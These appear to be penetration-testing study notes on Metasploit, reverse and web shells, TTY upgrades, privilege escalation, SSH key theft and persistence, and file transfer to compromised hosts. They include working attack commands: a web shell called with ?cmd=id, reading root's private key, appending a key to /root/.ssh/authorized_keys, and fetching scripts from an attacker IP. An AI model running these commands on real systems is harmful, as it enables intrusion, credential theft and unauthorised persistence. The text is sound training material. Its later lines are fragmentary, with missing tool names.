Metasploit Framework: Contains built-in exploits of public vulns
Recon scripts enum hosts, compromised targets
Verification scripts validate vulnerabilities without hacking it
Meterpreter -Connect to shells, run cmds on hacked targets
Post-exploit/pivot tools
msfconsole -q # start metasploit without banner
search exploit eternalblue # use number: search can apply filters
cve:2009type:exploit
help search # shows all filters
options # show module options
check # not every exploit supports this - checks if target vuln
run or exploit # start attempt
Reverse Shell Commands
Cmd we exec depends on OS a compromised host runs: What apps/cmds we can access
Certain cmds are more reliable: Can be attempted to get a reverse connection
Unlike revshells, if we drop a connection to a bind shell, we can connect back immediately
If the shell cmd stopped, or the remote host rebooted: Then we'd lose access
We can only type cmds/backspace when connected/can't move the cursor etc..
We can upgrade our TTY by mapping term TTY with remote one
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl +z # background: get back on local term
stty raw -echo # raw mode: what's sent is exactly what's received
fg # foreground
echo $TERM # see terminal type
stty size # size for rows/columns
export TERM=xterm-256color # change term settings
stty rows 67 columns 318 # change row/column size settings
Accepts cmd via HTTP params like GET/POST execs, prints back: web scripts (PHP/ASP)
Web shell scripts typically 1-liners
Need to place our script into the remote host's web dir (webroot) to exec through browser
Visit shell.php page on site, and use ?cmd=id to execute id:
http://server_ip:port/shell.php?cmd=id
we can also use curl
curl http://SERVER_IP:PORT/shell.php?cmd=id
Privilege Escalation
dkpg -l # see what software is installed
C:\Program Files # see what software is installed windows
find / -perm -u=s -type f 2>/dev/null # find all perms with s
sudo -l # check what sudo privs we have
User Privileges
Allows a user to exec cmds as a diff user: Lower priv users to exec cmds as root without access
Set user id: Perm that assigns to exec files: users who exec file temp assume privs of file's owner
Security objects that contain info about user privs
User logs in, LSA: Local Security Authority creates access token: Contains list of privs
Scheduled Tasks
Cron jobs: Form of scheduling tasks with specific dirs we utilize to add jobs: Need right perms
If we can write to a dir called by a cron job: should send us a shell when exec
Exposed Credentials Common config files, logs, user history (bash_history/PSReadLine in Win)
SSH KeysIf we have read access over .ssh dir for a specific user
We might be able to read priv ssh keys in
/home/user/.ssh/id_rsa or /root/.ssh/id_rsa and use that to log in
If we can read the /root/.ssh/ dir, we can cp it to our machine using -i
cat /home/user/.ssh/id_rsa or cat /home/root.ssh/id_rsa
vim id_rsa
chmod 600 id_rsa # changes perms to be more restricetive:
# lax perms means ssh server could prevent them from working
ssh mootarget@10.10.10.10 -i id_rsa
If we see write access to a user/.ssh/ dir, can place our public key in the dir
SSH config won't accept keys written by other users, so works if we have control over them
cat /home/user/.ssh/authorized_keys
ssh-keygen -f key # create new key, -f output file
# 2 files created
1. key (we use this with ssh -i)
2. key.pub # we copy this to the remote machine
# cp key.pub onto the remote machine
# add it to /home/root/.ssh/authorized_keys
echo "ssh-rsa DSJDKLAAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
# echo typically achieves this and all we're doing here is appending it to the file
ssh root@10.10.10.1 -i key
cd /tmp # go into tmp
python3 -m http.server 8000 # start simple server
wget http://10.10.14.1:8000/linenum.sh # has to be in the same dir listed - dl
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh # -o output file name
scp linenum.sh user@remotehost:/tmp/linenum.sh
# specify local file w/scp, remote dir saved
base64 shell -w 0 # xsfer bin file shell, b64 encode it
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU
echo f0VMRgA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU | base64 -d > shell
# copy b64 str, go to remote host: use b64 -d to decode and pip to file
file shell # validate file format
md5sum shell # check md5sums of both files
Netcat: Win: | Win alt:
Features nc doesn't have (fwding ports, connecting to serial devices)
Can also be used to
of socat: Can xfer to a system after RCE to get more stable revshell
or to perform dir enum
/Aquatone can be used to take screens of targets, fingerprint, and id for default creds
on Windows
Virtual machines on such as or
Hypervisors: , or on Windows/Linux
, requires a paid license but offers many features Hypervisor: Allows us to create/run VMs: Enables us to use host to run VMs by virtually sharing mem/resources
Online exploit DBs to search for vulns: , ,
: Comprehensive list of revshells we can use
, , , ,
Win: , , || Noisy: Will trigger stuff
List of cmds/how they can be exploited through sudo
List of Win apps leverage, like downloading files/exec cmds
Transferring Files on our machine and wget/cURL to download files
Base64 encode the file into b64, paste the str on the remote server, decod
